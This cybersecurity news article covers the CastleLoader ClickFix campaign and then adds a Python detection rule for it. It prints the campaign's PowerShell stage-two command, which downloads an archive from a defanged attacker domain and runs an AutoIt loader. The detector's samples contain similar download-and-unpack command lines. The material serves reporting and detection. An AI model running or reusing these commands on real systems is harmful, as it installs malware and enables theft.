New CastleLoader Attack Using Cloudflare-Themed Clickfix Technique to Infect Windows Computers

Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.

CastleLoader, a rapidly evolving loader discovered in 2025, has surged across underground networks by weaponizing Cloudflare-themed “Clickfix” phishing pages and doctored GitHub repositories to compromise Windows hosts.

The malware masquerades as benign developer resources, browser updates, or meeting portals, luring unsuspecting users into copying a seemingly innocent PowerShell command that promises to “verify” or “repair” site access.

Once executed, that single line silently pulls CastleLoader onto the machine, opening the door to information-stealers such as StealC and RedLine as well as remote-access trojans like NetSupport RAT and SectopRAT.

The scope of the threat is significant: between May and July 2025 researchers recorded 1,634 malware-download attempts and 469 confirmed infections—an alarming 28.7% success rate among users who clicked the malicious links.

Catalyst analysts identified at least seven distinct command-and-control (C2) servers coordinating these campaigns, several of which targeted government networks in the United States.

In every observed wave, CastleLoader served as the common delivery hub, dynamically selecting secondary payloads according to each victim’s profile.

CastleLoader’s attack chain and distribution mechanism (Source – Catalyst)

Catalyst researchers noted that the platform’s web-based C2 panel mirrors a malware-as-a-service dashboard, complete with statistics, geographic filters, and one-click redeployment to already compromised systems.

Operators upload new binaries to a “Delivery” module and then craft tasks that embed PowerShell inline in URL parameters, allowing campaign changes without touching the host sites.

The result is a resilient infrastructure that frustrates take-downs while letting attackers iterate within minutes.

Inside the Clickfix Infection Mechanism

The hallmark of CastleLoader is its clipboard-poisoning “Clickfix” routine. When a victim loads the fake Cloudflare verification page, embedded JavaScript silently requests /s.php?an=0 to retrieve a Base64-encoded PowerShell payload and copies it to the clipboard via unsecuredCopyToClipboard().

CastleLoader attack chain using the ClickFix technique (Source – Catalyst)

Users obey on-screen instructions to paste the code into the Windows Run dialog, triggering the next stage:

# Snippet excerpted from teamsi.org campaign
# Note: the backslash path separators below are assumed; the published extract had dropped them.
[System.Guid]$GDSGFBKSD = [System.Guid]::NewGuid().ToString();            # random name for the staged archive
$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;                  # resolves to %USERPROFILE%\AppData
Invoke-WebRequest 'https://teamsap[.]org/s.php?an=2' -OutFile "$env:MYAPPDATA\$GDSGFBKSD.zip";   # stage 2 download
Expand-Archive "$env:MYAPPDATA\$GDSGFBKSD.zip" -DestinationPath "$env:MYAPPDATA";               # unpack AutoIT loader
& "$env:MYAPPDATA\loader.au3";                                              # execute the loader

This script fetches a campaign-specific ZIP, unpacks an AutoIT loader, and executes shellcode that resolves hashed API names before contacting the C2 over HTTPS to fetch a final payload.

By staging downloads through legitimate-looking domains and legitimate tooling (AutoIT), CastleLoader sidesteps many content filters while leaving minimal disk artefacts.

Further persistence is optional but potent: the C2 can instruct hijacked hosts to create scheduled tasks, inject DLLs into trusted processes, or repeatedly rerun payloads whenever a user logs on.

Because tasks are loaded from the server in real time, defenders cannot rely on static indicators; instead, behavioral detection that flags clipboard manipulation followed by outbound PowerShell traffic offers the best chance of early disruption.
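One way to express that behavioral rule over process-creation telemetry, as an added example that is not part of the original article or of Catalyst's tooling: it flags PowerShell spawned by explorer.exe (a Run-dialog paste) whose command line, after decoding any -EncodedCommand blob, chains a download with Expand-Archive or an AutoIt file. The field names follow Sysmon EventID 1; the sample events and the example.invalid domain are constructed.

```python
import base64
import re

# Indicator patterns for the stages described above: download, unpack, AutoIt execution.
STAGE_PATTERNS = {
    "download": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b", re.I),
    "unpack": re.compile(r"expand-archive", re.I),
    "autoit": re.compile(r"\.au3\b|autoit3?\.exe", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded_command(cmdline: str) -> str:
    """Append the decoded -e/-ec/-enc/-EncodedCommand payload (base64 of UTF-16LE) so patterns see it."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed blob: fall back to the visible command line

def clickfix_indicators(event: dict) -> set:
    """Names of ClickFix-chain indicators present in one process-creation event."""
    cmd = expand_encoded_command(event.get("CommandLine", ""))
    hits = {name for name, pat in STAGE_PATTERNS.items() if pat.search(cmd)}
    parent, image = event.get("ParentImage", "").lower(), event.get("Image", "").lower()
    # A Run-dialog paste is a child of explorer.exe; scheduled or scripted PowerShell usually is not.
    if parent.endswith("\\explorer.exe") and image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        hits.add("explorer_parent")
    return hits

def is_clickfix_chain(event: dict) -> bool:
    """Flag interactive PowerShell that downloads, then unpacks or runs an AutoIt file."""
    hits = clickfix_indicators(event)
    return "explorer_parent" in hits and "download" in hits and bool(hits & {"unpack", "autoit"})

def encode_powershell(script: str) -> str:  # used only to build the encoded sample below
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS, EXPLORER = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe"
# Constructed Sysmon EventID 1 style records (hypothetical, not telemetry from the campaign).
SAMPLE_EVENTS = [
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": r"powershell -w hidden Invoke-WebRequest "
     r"'https://example.invalid/s.php?an=2' -OutFile $env:TEMP\a.zip; Expand-Archive $env:TEMP\a.zip; & $env:TEMP\loader.au3"},
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell -enc " + encode_powershell(
        "Invoke-WebRequest 'https://example.invalid/s.php?an=2' -OutFile a.zip; Expand-Archive a.zip")},
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell Get-ChildItem $env:APPDATA"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell -c Invoke-WebRequest https://updates.example.invalid/p.zip -OutFile p.zip; Expand-Archive p.zip"},
]
```

The fourth sample shows the parent-process gate at work: a service-launched download-and-unpack is not flagged, which keeps management scripts out of the alert queue.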
